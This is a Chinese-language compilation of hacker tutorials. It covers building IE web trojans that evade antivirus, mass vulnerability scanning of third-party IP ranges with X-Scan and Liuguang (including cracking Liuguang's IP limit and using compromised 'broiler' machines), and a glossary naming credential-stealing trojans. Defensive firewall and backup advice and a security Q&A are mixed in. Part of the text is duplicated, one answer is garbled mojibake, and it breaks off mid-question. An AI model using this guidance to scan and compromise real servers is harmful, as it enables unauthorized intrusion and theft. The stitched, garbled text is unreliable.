通过编写防火墙规则，可以让系统知道什么样的信息包可以进入、什么样的应该放弃，如此一来，当黑客发送有攻击性信息包的时候，在经过防火墙时，信息就会被丢弃掉，从而防止了黑客的进攻。但是这种做法仍然有它不足的地方，例如黑客可以改变攻击性代码的形态，让防火墙分辨不出信息包的真假；或者黑客干脆无休止的、大量的发送信息包，知道服务器不堪重负而造成系统崩溃。

3、修改系统协议：

对于漏洞扫描，系统管理员可以修改服务器的相应协议，例如漏洞扫描是根据对文件的申请返回值对文件存在进行判断的，这个数值如果是200则表示文件存在于服务器上，如果是404则表明服务器没有找到相应的文件，但是管理员如果修改了返回数值、或者屏蔽404数值，那么漏洞扫描器就毫无用处了。

4、经常升级系统版本：

任何一个版本的系统发布之后，在短时间内都不会受到攻击，一旦其中的问题暴露出来，黑客就会蜂拥而致。因此管理员在维护系统的时候，可以经常浏览著名的安全站点，找到系统的新版本或者补丁程序进行安装，这样就可以保证系统中的漏洞在没有被黑客发现之前，就已经修补上了，从而保证了服务器的安全。

5、及时备份重要数据：

亡羊补牢，如果数据备份及时，即便系统遭到黑客进攻，也可以在短时间内修复，挽回不必要的经济损失。想国外很多商务

你也可以当黑客 打造完美的IE网页木马


（残语：比较适合黑客中级选手，日后将推出视频教程）

既然要打造完美的IE网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：

一：可以躲过杀毒软件的追杀；

二：可以避开网络防火墙的报警；

三：能够适用于多数的Windows操作系统（主要包括Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003）中的多数IE版本（主要包括IE5.0、IE5.5、IE6.0），最好能打倒SP补丁；

四：让浏览者不容易发觉IE变化，即可以悄无声息，从而可以长久不被发现。

（注意以上四点只是指网页本身而言，但不包括你的木马程序，也就是说我们的网页木马只是负责运行指定的木马程序，至于你的木马程序的好坏只有你自己去选择啦！别找我要，我不会写的哦！）

满足以上四点我想才可以让你的马儿更青春更长久，跑的更欢更快……

看了上面的几点你是不是心动拉？别急，我们还是先侃侃现有的各种ＩＥ网页木马的不足吧！

第一种：利用古老的MIME漏洞的ＩＥ网页木马

这种木马现在还在流行，但因为此漏洞太过古老且适用的ＩＥ版本较少，而当时影响又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。

第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马

虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数ＩＥ版本中，是一个比较好的漏洞，利用价值非常高，但却因为它结合了流行的病毒调用的ＷＳＨ及ＦＳＯ控件，使其虽说可以避开网络防火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。

第三种：利用OBJECT对象类型确认漏洞（ＯｂｊｅｃｔＤａｔａＲｅｍｏｔｅ）并结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马（典型的代表有动鲨网页木马生成器）

此种木马最大的优点是适应的ＩＥ版本多，且漏洞较新，但却有如下不足：

１、因为此漏洞要调用Mshta.exe来访问网络下载木马程序，所以会引起防火墙报警（如天网防火墙）；

２、如果此ＩＥ网页木马又利用了ＷＳＨ及ＦＳＯ控件，同样逃不脱杀毒软件的追捕（如诺顿），而动鲨网页木马又恰恰使用了ＷＳＨ及ＦＳＯ控件，叹口气……可惜呀……？

３、再有就是这个漏洞需要网页服务器支持动态网页如ＡＳＰ、ＪＳＰ、ＣＧＩ等，这就影响了它的发挥，毕竟现在的免费稳定的动态网页空间是少之又少；虽说此漏洞也可利用邮件ＭＩＭＥ的形式来利用，但经测试发现对ＩＥ６．０不起作用。

看到上面的分析你是不是有了这种感觉：千军易得，一将难求，马儿成群，奈何千里马难寻！别急，下面让我带这大家一起打造我心中的完美ＩＥ网页木马。

=======================================================


扫描器的使用


这里我使用x-scanner作为介绍对象，原因是x-scanner集成了多种扫描功能于一身，它可以采用多线程方式对指定IP地址段（或独立IP地址）进行安全漏洞扫描，提供了图形界面和命令行两种操作方式，扫描内容包括：标准端口状态及端口banner信息、CGI漏洞、RPC漏洞、SQL-SERVER默认帐户、FTP弱口令，NT主机共享信息、用户信息、组信息、NT主机弱口令用户等。扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。对于一些已知的CGI和RPC漏洞，x-scanner给出了相应的漏洞描述、利用程序及解决方案，节省了查找漏洞介绍的时间。

首先x-scanner包括了两个运行程序：xscann.exe和xscan_gui.exe，这两个程序分别是扫描器的控制台版本和窗口版本，作为初学者可能更容易接受窗口版本的扫描软件，因为毕竟初学者使用最多的还是“应用程序”，无论运行那一个版本，他们的功能都是一样的。首先让我们运行窗口版本看看：窗口分为左右两部分，左面是进行扫描的类型，这包括前面提到的漏洞扫描、端口扫描等基本内容；另一部分是有关扫描范围的设定，xscanner可以支持对多个IP地址的扫描，也就是说使用者可以利用xscanner成批扫描多个IP地址，例如在IP地址范围内输入211.100.8.1-211.100.8.255就会扫描整个C类的255台服务器（如果存在的话），这样黑客可以针对某一个漏洞进行搜索，找到大范围内所有存在某个漏洞的服务器。当然如果只输入一个IP地址，扫描程序将针对单独IP进行扫描。

剩下的端口设定在前面已经介绍过，一般对于网站服务器，这个端口选取80或者8080，对于某些特殊的服务器也许还有特殊的端口号，那需要通过端口扫描进行寻找。多线程扫描是这个扫描器的一大特色，所谓多线程就是说同时在本地系统开辟多个socket连接，在同一时间内扫描多个服务器，这样做的好处是提高了扫描速度，节省时间，根据系统的资源配置高低，线程数字也可以自行设定（设定太高容易造成系统崩溃）。

在图形界面下我们看到了程序连接地址“.\xscan.exe”，这实际上就是xscanner的控制台程序，也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理，程序运行真正执行的还是控制台程序。因此学习控制台是黑客所必需的，而且使用控制台模式的程序也是真正黑客喜爱的操作方式。

现在我们进行一个简单的cgi漏洞扫描，这次演练是在控制台模式下进行的：xscan 211.100.8.87 -port

这个命令的意思是让xscanner扫描服务器211.100.8.87的开放端口，扫描器不会对65535个端口全部进行扫描（太慢），它只会检测网络上最常用的几百个端口，而且每一个端口对应的网络服务在扫描器中都已经做过定义，从最后返回的结果很容易了解服务器运行了什么网络服务。扫描结果显示如下：

Initialize dynamic library succeed.

Scanning 211.100.8.87 ......

[211.100.8.87]: Scaning port state ...

[211.100.8.87]: Port 21 is listening!!!

[211.100.8.87]: Port 25 is listening!!!

[211.100.8.87]: Port 53 is listening!!!

[211.100.8.87]: Port 79 is listening!!!

[211.100.8.87]: Port 80 is listening!!!

[211.100.8.87]: Port 110 is listening!!!

[211.100.8.87]: Port 3389 is listening!!!

[211.100.8.87]: Port scan completed, found 7.

[211.100.8.87]: All done.

这个结果还会同时在log目录下生成一个html文档，阅读文档可以了解发放的端口对应的服务项目。从结果中看到，这台服务器公开放了七个端口，主要有21端口用于文件传输、80端口用于网页浏览、还有110端口用于pop3电子邮件，如此一来，我们就可以进行有关服务的漏洞扫描了。(关于端口的详细解释会在后续给出)

然后可以使用浏览看看这个服务器到底是做什么的，通过浏览发现原来这是一家报社的电子版面，这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在perl漏洞，之后进行进一步进攻。

漏洞扫描的道理和端口扫描基本上类似，例如我们可以通过扫描器查找61.135.50.1到61.135.50.255这255台服务器上所有开放了80端口的服务器上是否存在漏洞，并且找到存在什么漏洞，则可以使用xscan 61.135.50.1-61.135.50.255 -cgi进行扫描，因为结果比较多，通过控制台很难阅读，这个时候xscanner会在log下生成多个html的中文说明，进行阅读这些文档比较方便。

二、扫描器使用问题：

载使用漏洞扫描器的过程中，学习者可能会经常遇到一些问题，这里给出有关问题产生的原因和解决办法。扫描器的使用并不是真正黑客生涯的开始，但它是学习黑客的基础，所以学习者应该多加练习，熟练掌握手中使用的扫描器，了解扫描器的工作原理和问题的解决办法。

1、为什么我找不到扫描器报告的漏洞？

扫描器报告服务器上存在某个存在漏洞的文件，是发送一个GET请求并接收服务器返回值来判断文件是否存在，这个返回值在HTTP的协议中有详细的说明，一般情况下“200”是文件存在，而“404”是没有找到文件，所以造成上面现象的具体原因就暴露出来了。

造成这个问题的原因可能有两种：第一种可能性是您的扫描器版本比较低，扫描器本身存在“千年虫”问题，对于返回的信息扫描器在判断的时候，会错误的以为时间信息2000年x月x日中的200是“文件存在”标志，这样就会造成误报；

另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改，如果GET申请的文件不存在，服务器会自动指向一个“没有找到页面”的文档，所以无论文件是否存在，都不会将“404”返回，而是仍然返回成功信息，这样做是为了迷惑漏洞扫描器，让攻击者不能真正判断究竟那个漏洞存在于服务器上。

这一问题的解决办法也要分情况讨论，一般说来第一种情况比较容易解决，直接升级漏洞扫描器就可以了，对于第二种情况需要使用者对网络比较熟悉，有能力的话可以自己编写一个漏洞扫描器，自己编写的扫描器可以针对返回文件的大小进行判断，这样就可以真正确定文件是否存在，但这种方法对使用者的能力要求较高。

2、我使用的扫描器速度和网络速度有关系嘛？

关系不大。扫描器发送和接收的信息都很小，就算是同时发送上百个GET请求一般的电话上网用户也完全可以做得到，影响扫描器速度的主要因素是服务器的应答速度，这取决于被扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度，可以使用支持多线程的扫描器，但是因为使用者本地电脑档次问题，也不可能将线程设置到上百个，那样的话会造成本地系统瘫痪，一般使用30个线程左右比较合适。

另外对于很多网络服务器来说，为了防止黑客的扫描行为，可能会在防火墙上设置同一IP的单位时间GET申请数量，这样做目的就是避免黑客的扫描和攻击，所以在提高本地扫描速度之前，应该先确认服务器没有相应的过滤功能之后再使用。

3、扫描器报告给我的漏洞无法利用是什么原因？

确切地说扫描器报告的不是“找到的漏洞”，而是找到了一个可能存在漏洞的文件，各种网络应用程序都可能存在漏洞，但是在更新版本的过程中，老版本的漏洞会被修补上，被扫描器找到的文件应该经过手工操作确认其是否是存在漏洞的版本，这可以通过阅读网络安全网站的“安全公告”获得相应知识。

对于已经修补上漏洞的文件来说，也不代表它一定不再存有漏洞，而只能说在一定程度上没有漏洞了，也许在明天，这个新版本的文件中又会被发现还存在其他漏洞，因此这需要网络安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉，也可以自己阅读程序并力图自己找到可能的安全隐患，很多世界著名的黑客都是不依*他人，而是自己寻找漏洞进行攻击的。

4、扫描器版本比较新，然而却从来没有找到过漏洞是什么原因？

有一些扫描器专门设计了“等待时间”，经过设置可以对等待返回信息的时间进行调整，这就是说在“网络连接超时”的情况下，扫描器不会傻傻的一直等待下去。但如果你的网络速度比较慢，有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下面的扫描，这样当然是什么也找不到啦。

如果问题真的如此，可以将等待时间设置的长一些，或者换个ISP拨号连接。

5、扫描器报告服务器没有提供HTTP服务？

网络上大多数HTTP服务器和漏洞扫描器的默认端口都是80，而有少量的HTTP服务器并不是使用80端口提供服务的，在确认服务器的确开通了网站服务的情况下，可以用端口扫描器察看一下对方究竟使用什么端口进行的HTTP服务，网络上常见的端口还有8080。

另外这种情况还有一种可能性，也许是使用者对扫描器的参数设置不正确造成的，很多扫描器的功能不仅仅是漏洞扫描，有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能，因此在使用每一款扫描器之前，都应该自己阅读有关的帮助说明，确保问题不是出在自己身上。

6、扫描器使用过程中突然停止响应是为什么？

扫描器停止响应是很正常的，有可能是因为使用者连接的线程过多，本地系统资源不足而造成系统瘫痪、也可能是因为对方服务器的响应比较慢，依次发送出去的请求被同时反送回来而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙，一旦察觉有人扫描就发送特殊的数据报回来造成系统瘫痪……

因此扫描器停止响应不能简单的说是为什么，也没有一个比较全面的解决方案，不过一般情况下遇到这种问题，我建议你可以更换其他扫描器、扫描另外一些服务器试试，如果问题还没有解决，就可能是因为扫描器与你所使用的系统不兼容造成的，大多数基于微软视窗的漏洞扫描器都是运行在Windows9X下的，如果是Win2000或者NT也有可能造成扫描器无法正常工作。

7、下载回来的扫描器里面怎么没有可执行文件？

扫描器不一定非要是可执行的exe文件，其他例如perl、cgi脚本语言也可以编写扫描器，因此没有可执行文件的扫描器也许是运行在网络服务器上的，这种扫描器可以被植入到网络上的其它系统中，不需要使用者上网就能够24小时不停的进行大面积地址扫描，并将结果整理、分析，最后通过Email发送到指定的电子信箱中，因此这是一种比较高级的扫描器，初学者不适合使用。

另外注意载下在扫描器的时候注意压缩报文件的扩展名，如果是tar为扩展名，那么这个扫描器是运行在Linux系统下的，这种其它操作平台的扫描器无法在视窗平台下应用，文件格式也和FAT32不一样。

8、扫描器只报告漏洞名称，不报告具体文件怎么办？

只要漏洞被发现，网络安全组织即会为漏洞命名，因此漏洞名称对应的文件在相当广泛的范围内都是统一的，只要知道了漏洞的名称，黑客就可以通过专门的漏洞搜索引擎进行查找，并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多，例如我国“绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。

===========================================================


如何防范黑客

黑客对服务器进行扫描是轻而易举的，一旦找到了服务器存在的问题，那么后果将是严重的。这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描，本节我将谈谈如何才能让自己的服务器免遭黑客扫描。

一、防范黑客心得体会：

1、屏蔽可以IP地址：

这种方式见效最快，一旦网络管理员发现了可疑的IP地址申请，可以通过防火墙屏蔽相对应的IP地址，这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点，例如很多黑客都使用的动态IP，也就是说他们的IP地址会变化，一个地址被屏蔽，只要更换其他IP仍然可以进攻服务器，而且高级黑客有可能会伪造IP地址，屏蔽的也许是正常用户的地址。

2、过滤信息包：

通过编写防火墙规则，可以让系统知道什么样的信息包可以进入、什么样的应该放弃，如此一来，当黑客发送有攻击性信息包的时候，在经过防火墙时，信息就会被丢弃掉，从而防止了黑客的进攻。但是这种做法仍然有它不足的地方，例如黑客可以改变攻击性代码的形态，让防火墙分辨不出信息包的真假；或者黑客干脆无休止的、大量的发送信息包，知道服务器不堪重负而造成系统崩溃。

3、修改系统协议：

对于漏洞扫描，系统管理员可以修改服务器的相应协议，例如漏洞扫描是根据对文件的申请返回值对文件存在进行判断的，这个数值如果是200则表示文件存在于服务器上，如果是404则表明服务器没有找到相应的文件，但是管理员如果修改了返回数值、或者屏蔽404数值，那么漏洞扫描器就毫无用处了。

4、经常升级系统版本：

任何一个版本的系统发布之后，在短时间内都不会受到攻击，一旦其中的问题暴露出来，黑客就会蜂拥而致。因此管理员在维护系统的时候，可以经常浏览著名的安全站点，找到系统的新版本或者补丁程序进行安装，这样就可以保证系统中的漏洞在没有被黑客发现之前，就已经修补上了，从而保证了服务器的安全。

5、及时备份重要数据：

亡羊补牢，如果数据备份及时，即便系统遭到黑客进攻，也可以在短时间内修复，挽回不必要的经济损失。想国外很多商务网站，都会在每天晚上对系统数据进行备份，在第二天清晨，无论系统是否收到攻击，都会重新恢复数据，保证每天系统中的数据库都不会出现损坏。数据的备份最好放在其他电脑或者驱动器上，这样黑客进入服务器之后，破坏的数据只是一部分，因为无法找到数据的备份，对于服务器的损失也不会太严重。

然而一旦受到黑客攻击，管理员不要只设法恢复损坏的数据，还要及时分析黑客的来源和攻击方法，尽快修补被黑客利用的漏洞，然后检查系统中是否被黑客安装了木马、蠕虫或者被黑客开放了某些管理员账号，尽量将黑客留下的各种蛛丝马迹和后门分析清除、清除干净，防止黑客的下一次攻击。

6、使用加密机制传输数据：

对于个人信用卡、密码等重要数据，在客户端与服务器之间的传送，应该仙经过加密处理在进行发送，这样做的目的是防止黑客监听、截获。对于现在网络上流行的各种加密机制，都已经出现了不同的破解方法，因此在加密的选择上应该寻找破解困难的，例如DES加密方法，这是一套没有逆向破解的加密算法，因此黑客的到了这种加密处理后的文件时，只能采取暴力破解法。个人用户只要选择了一个优秀的密码，那么黑客的破解工作将会在无休止的尝试后终止。

二、防火墙使用说明：

1．什么是防火墙？

防火墙的英文叫做firewall，它能够在网络与电脑之间建立一道监控屏障，保护在防火墙内部的系统不受网络黑客的攻击。逻辑上讲，防火墙既是信息分离器、限制器，也是信息分析器，它可以有效地对局域网和Internet之间的任何活动进行监控，从而保证局域网内部的安全。

网络上最著名的软件防火墙是LockDown2000，这套软件需要经过注册才能获得完整版本，它的功能强大，小到保护个人上网用户、大到维护商务网站的运作，它都能出色的做出惊人的表现。但因为软件的注册需要一定费用，所以对个人用户来说还是选择一款免费的防火墙更现实。天网防火墙在这里就更加适合个人用户的需要了，天网防火墙个人版是一套给个人电脑使用的网络安全程序，它能够抵挡网络入侵和攻击，防止信息泄露。

2、天网防火墙的基本功能：

天网防火墙个人版把网络分为本地网和互联网，可以针对来自不同网络的信息，来设置不同的安全方案，以下所述的问题都是针对互联网而言的，故所有的设置都是在互联网安全级别中完成的。 怎样防止信息泄露？ 如果把文件共享向互联网开放，而且又不设定密码，那么别人就可以轻松的通过互联网看到您机器中的文件，如果您还允许共享可写，那别人甚至可以删除文件。 你可以在个人防火墙的互联网安全级别设置中，将NETBIOS 关闭，这样别人就不能通过INTERNET访问你的共享资源了（这种设置不会影响你在局域网中的资源共享）。

当拨号用户上网获得了分配到的IP地址之后，可以通过天网防火墙将ICMP关闭，这样黑客用PING的方法就无法确定使用者的的系统是否处于上网状态，无法直接通过IP地址获得使用者系统的信息了。

需要指出的是：防火墙拦截的信息并不完全是攻击信息，它记录的只是系统在安全设置中所拒绝接收的数据包。在某些情况下，系统可能会收到一些正常但又被拦截的数据包，例如某些路由器会定时发出一些IGMP包等；或有些主机会定时PING出数据到本地系统确认连接仍在维持着，这个时候如果利用防火墙将ICMP和IGMP屏蔽了，就会在安全记录中见到这些被拦截的数据包，因此这些拦截下来的数据包并不一定是黑客对系统进行攻击造成的。

3、使用防火墙的益处：

使用防火墙可以保护脆弱的服务，通过过滤不安全的服务，Firewall可以极大地提高网络安全和减少子网中主机的风险。例如，Firewall可以禁止NIS、NFS服务通过，同时可以拒绝源路由和ICMP重定向封包。

另外防火墙可以控制对系统的访问权限，例如某些企业允许从外部访问企业内部的某些系统，而禁止访问另外的系统，通过防火墙对这些允许共享的系统进行设置，还可以设定内部的系统只访问外部特定的Mail Server和Web Server，保护企业内部信息的安全。

4、防火墙的种类：

防火墙总体上分为包过滤、应用级网关和代理服务器等三种类型：

（1）数据包过滤

数据包过滤(Packet Filtering)技术是在网络层对数据包进行选择，选择的依据是系统内设置的过滤逻辑，被称为访问控制表(Access Control Table)。通过检查数据流中每个数据包的源地址、目的地址、所用的端口号、协议状态等因素，或它们的组合来确定是否允许该数据包通过。 数据包过滤防火墙逻辑简单，价格便宜，易于安装和使用，网络性能和透明性好，它通常安装在路由器上。路由器是内部网络与Internet连接必不可少的设备，因此在原有网络上增加这样的防火墙几乎不需要任何额外的费用。

数据包过滤防火墙的缺点有二：一是非法访问一旦突破防火墙，即可对主机上的软件和配置漏洞进行攻击；二是数据包的源地址、目的地址以及IP的端口号都在数据包的头部，很有可能被窃听或假冒。

（2）应用级网关

应用级网关(Application Level Gateways)是在网络应用层上建立协议过滤和转发功能。它针对特定的网络应用服务协议使用指定的数据过滤逻辑，并在过滤的同时，对数据包进行必要的分析、登记和统计，形成报告。实际中的应用网关通常安装在专用工作站系统上。

数据包过滤和应用网关防火墙有一个共同的特点，就是它们仅仅依*特定的逻辑判定是否允许数据包通过。一旦满足逻辑，则防火墙内外的计算机系统建立直接联系，防火墙外部的用户便有可能直接了解防火墙内部的网络结构和运行状态，这有利于实施非法访问和攻击。

（3）代理服务

代理服务(Proxy Service)也称链路级网关或TCP通道(Circuit Level Gateways or TCP Tunnels)，也有人将它归于应用级网关一类。它是针对数据包过滤和应用网关技术存在的缺点而引入的防火墙技术，其特点是将所有跨越防火墙的网络通信链路分为两段。防火墙内外计算机系统间应用层的" 链接"，由两个终止代理服务器上的" 链接"来实现，外部计算机的网络链路只能到达代理服务器，从而起到了隔离防火墙内外计算机系统的作用。此外，代理服务也对过往的数据包进行分析、注册登记，形成报告，同时当发现被攻击迹象时会向网络管理员发出警报，并保留攻击痕迹

=========================================================


黑客之“名词介绍”

1.肉鸡，或者留了后门，可以被我们远程操控的机器，现在许多人把有WEBSHELL权限的机器也叫肉鸡。

2、木马：特洛伊木马，大家在电影《特洛伊》里应该看到了，战争是特络伊故意留下了个木马，多方以为是战利品，带回城后，木马里面全是战士，这种东西，就叫做木马，可以说木马就是一方给肉鸡留下的东西，可以做到远程控制的目的，木马还分不同的作用，有盗号专用的木马，有远程控制专用的木马，下面介绍点：盗号专用的有许多，盗QQ的有 啊拉QQ大盗，强强盗QQ，传奇木马生成器，魔兽木马生成器等；远程控制的木马有：冰河(国人的骄傲，中国第一款木马)，灰鸽子，PCshare，网络神偷，FLUX等，现在通过线程插入技术的木马也有很多，大家自己找找吧。

3、病毒：这个我想不用解释了吧，相信大家都和它打过交道，病毒大多具有破坏性，传播性，隐秘性，潜伏性。

4、后门：这个就是入侵后为方便我们下次进入肉鸡方便点所留下的东西，亲切的称为后门，现在好点的后门有REDMAIN等。

5、CRACK：这个名词很容易和HACK混淆，但是许多人不理解CRACK这个东西，但是接触过软件破解的人一定了解这个词 CRACKER分析下就是软件破解者的意思(注意这里有多了个ER)，许多共享软件就是我们的CRACKER来完成破解的，就是现在俗称的XX软件破解版。

6、漏洞：这个名词相信也不用太多的介绍，根据字面意思也可以理解，就好象一个房子，门很结实，可是有个窗户却不好，这就很可能造成被别人进入，入侵是也是相对的，必须要有漏洞才可以入侵，这里顺便介绍下打补丁的意思，还是用上面的例子门很结实，可窗户不好，这里我们需要把窗户补上，就叫打补丁了，许多人问过我怎样知道自己的机器有漏洞？怎样打补丁？这里也回答下，首先介绍怎样检查自己奇迹有什么样的漏洞，有款工具简称为MBSA是微软公司针对windows系统的安全检测工具，大家可以去网上找到自己下下来检测下自己机器有什么样的漏洞，还介绍下微软的漏洞名称 MS05-001 MS05-002 这种形式的前面MS应为是微软的意思吧，05呢是2005年，001是在2005年第一个漏洞(不知道解释的对不，自己的理解)大家还可以下个金山毒霸，金山可以有个漏洞检测功能，还可以帮你补上相应的补丁，那么怎么打补丁呢?其实这个很简单，在微软的官方网站里可以输入 MS05-001(如果你有这个漏洞的话)微软就找出了响应的补丁，下载下来 安装下其实就可以了，呵呵，打补丁也不是什么困难的事情哦。

7、端口：这个是入侵是很重要的一个环节，端口这个东西就好象是我要买东西，需要在1号窗口来结帐，而开放的1号窗口就好比响应的端口，端口可以形象的比喻成窗口，呵呵，不同的端口开放了不同的服务，大家可以在网上找到端口对照表来看下不同的端口开放的是什么服务。

8、权限：这个东西和人权一个效果，我们有自己的权利，但是我们的权利不能超出自己的范围，比如法律可以控制人的生命，这种最高权限呢就是计算机中的 Admin权限 最高权限，法官呢是执行法律的人，比法律底点，这个呢就是SYSTEM权限，系统权限，以下每种人有着自己不同的权限，比如我们得到了个WEBSHELL权限，许多人不知道这个是什么权限，其实就是个WEB(网业)的管理权限，权限一般比较低，但是有时想得到个服务器的ADMIN权限，就可以先丛WEBSHELL权限来入手，也就是长说的提权。

==================================================


黑客利器流光使用技巧


流光这款软件除了能够像X-Scan那样扫描众多 漏洞、弱口令外，还集成了常用的入侵工具，如字典工具、NT/IIS工具等，还独创了能够控制“肉鸡”进行扫描的“流光Sensor工具”和为“肉鸡”安装服务的“种植者”工具。


[img]http://cimg.163.com/catchpic/0/01/017362E7E9CD9FEFEA3E63510AD2FAA9.jpg&#39;);" onload='if(this.width>screen.width-460)this.width=screen.width-460'>

与X-Scan相比，流光的功能多一些，但操作起来难免繁杂。由于流光的功能过于强大，而且功能还在不断扩充中，因此流光的作者小榕限制了流光所能扫描的IP范围，不允许流光扫描国内IP地址，而且流光测试版在功能上也有一定的限制。但是，入侵者为了能够最大限度地使用流光，在使用流光之前，都需要用专门的破解程序对流光进行破解，去除IP范围和功能上的限制。

安装与打补丁完成后，打开流光，界面如图所示。



实例：使用流光高级扫描功能检测210.□.□.2到210.□.□.253网段主机的系统缺陷

步骤一：打开高级扫描向导、设置扫描参数。

在流光4.7主界面下，通过选择“文件（F）”→“高级扫描向导（W）”或使用快捷健“Ctrl+W”打开高级扫描向导。在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束IP地址；在“目标系统”中选择预检测的操作系统类型；在“获取主机名”、“PING检查”前面打钩；在“检测项目”中，选择“全选”；选好后如图所示。[morningsky]



然后单击“下一步（N）”按钮，在图中选中“标准端口扫描”。



说明：

“标准端口扫描”：只对常见的端口进行扫描。

“自定端口扫描范围”：自定义端口范围进行扫描。

然后单击“下一步（N）”按钮，在图中进行设置。



设置好所有检测项目后，然后单击“下一步（N）”按钮来到图界面，选择“本地主机”，表示使用本机执行扫描任务。



步骤二：开始扫描。

在图1-69中单击“开始（S）”按钮进行扫描。在扫描过程中，如果想要停止，通过单击最下角的“取消”按钮来实现，不过需要相当一段时间才能真正地停止，所以建议一次不要扫太大的网段，如果因扫描时间过长而等不及，这时候再想让流光停下来是不容易的。

步骤三：查看扫描报告。

扫描结束后，流光会自动打开HTML格式的扫描报告，如图所示。



需要指出的是，在扫描完成后，流光不仅把扫描结果整理成报告文件，而且还把可利用的主机列在流光界面的最下方，如图所示。


除了使用“高级扫描向导”配置高级扫描外，还可以直接选取高级扫描工具，如图所示。



打开“高级扫描设置”，其界面如图所示。



关于流光的使用就介绍到这里，本节中所介绍的只是流光功能的一小部分，其他一些功能会在以后的实例中逐一介绍。流光扫描器自身的设置是比较复杂的，有很多选项可以自由设定，因而也给使用者更大的发挥空间，可以根据网络和机器的状况来尝试改变这些设置，提高扫描器的性能，而且流光中还有详细的FAQ问题解答。


--------------------------------------------------------------------------------

广陵寒

黑客新手基础知识16问答

问：什么是网络安全?

答：网络安全是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭到破坏、更改、泄露，系统可以连续可*正常地运行，网络服务不被中断。

问：什么是计算机病毒?

答：计算机病毒（Computer Virus）是指编制者在计算机程序中插入的破坏计算机功能或者破坏数据，影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。

问：什么是木马?

答：木马是一种带有恶意性质的远程控制软件。木马一般分为客户端（client）和服务器端（server）。客户端就是本地使用的各种命令的控制台，服务器端则是要给别人运行，只有运行过服务器端的计算机才能够完全受控。木马不会像病毒那样去感染文件。

问：什么是防火墙?它是如何确保网络安全的？

答：使用防火墙（Firewall）是一种确保网络安全的方法。防火墙是指设置在不同网络（如可信任的企业内部网和不可信的公共网）或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的惟一出入口，能根据企业的安全政策控制（允许、拒绝、监测）出入网络的信息流，且本身具有较强的抗攻击能力。它是提供信息安全服务，实现网络和信息安全的基础设施。

问：什么是后门?为什么会存在后门？

答：后门（Back Door）是指一种绕过安全性控制而获取对程序或系统访问权的方āＴ谌砑?目?⒔锥危?绦蛟背；嵩谌砑?诖唇ê竺乓员憧梢孕薷某绦蛑械娜毕荨Ｈ绻?竺疟黄渌?酥?溃?蚴窃诜⒉既砑??懊挥猩境??敲此?统闪税踩??肌?

问：什么叫入侵检测？

答：入侵检测是防火墙的合理补充，帮助系统对付网络攻击，扩展系统管理员的安全管理能力（包括安全审计、监视、进攻识别和响应），提高信息安全基础结构的完整性。它从计算机网络系统中的若干关键点收集信息，并分析这些信息，检查网络中是否有违反安全策略的行为和遭到袭击的迹象

问：什么叫数据包监测?它有什么作用？

答：数据包监测可以被认为是一根窃听电话线在计算机网络中的等价物。当某人在“监听”网络时，他们实际上是在阅读和解释网络上传送的数据包。如果你需要在互联网上通过计算机发送一封电子邮件或请求下载一个网页，这些操作都会使数据通过你和数据目的地之间的许多计算机。这些传输信息时经过的计算机都能够看到你发送的数据，而数据包监测工具就允许某人截获数据并且查看它。

问：什么是NIDS？

答：NIDS是Network Intrusion Detection System的缩写，即网络入侵检测系统，主要用于检测Hacker或Cracker通过网络进行的入侵行为。NIDS的运行方式有两种，一种是在目标主机上运行以监测其本身的通信信息，另一种是在一台单独的机器上运行以监测所有网络设备的通信信息，比如Hub、路由器。

问：什么叫SYN包?

答：TCP连接的第一个包，非常小的一种数据包。SYN攻击包括大量此类的包，由于这些包看上去来自实际不存在的站点，因此无法有效进行处理。

问：加密技术是指什么?

答：加密技术是最常用的安全保密手段，利用技术手段把重要的数据变为乱码（加密）传送，到达目的地后再用相同或不同的手段还原（解密）。
加密技术包括两个元素：算法和密钥。算法是将普通的信息或者可以理解的信息与一串数字（密钥）结合，产生不可理解的密文的步骤，密钥是用来对数据进行编码和解密的一种算法。在安全保密中，可通过适当的钥加密技术和管理机制来保证网络的信息通信安全。

问：什么叫蠕虫病毒?

答：蠕虫病毒（Worm）源自第一种在网络上传播的病毒。1988年，22岁的康奈尔大学研究生罗伯特·莫里斯（Robert Morris）通过网络发送了一种专为攻击UNIX系统缺陷、名为“蠕虫”（Worm）的病毒。蠕虫造成了6000个系统瘫痪，估计损失为200万到6000万美元。由于这只蠕虫的诞生，在网上还专门成立了计算机应急小组（CERT）。现在蠕虫病毒家族已经壮大到成千上万种，并且这千万种蠕虫病毒大都出自黑客之手。

问：什么是操作系统型病毒?它有什么危害？

答：这种病毒会用它自己的程序加入操作系统或者取代部分操作系统进行工作，具有很强的破坏力，会导致整个系统瘫痪。而且由于感染了操作系统，这种病毒在运行时，会用自己的程序片断取代操作系统的合法程序模块。根据病毒自身的特点和被替代的操作系统中合法程序模块在操作系统中运行的地位与作用，以及病毒取代操作系统的取代方式等，对操作系统进行破坏。同时，这种病毒对系统中文件的感染性也很强。

问：莫里斯蠕虫是指什么?它有什么特点？

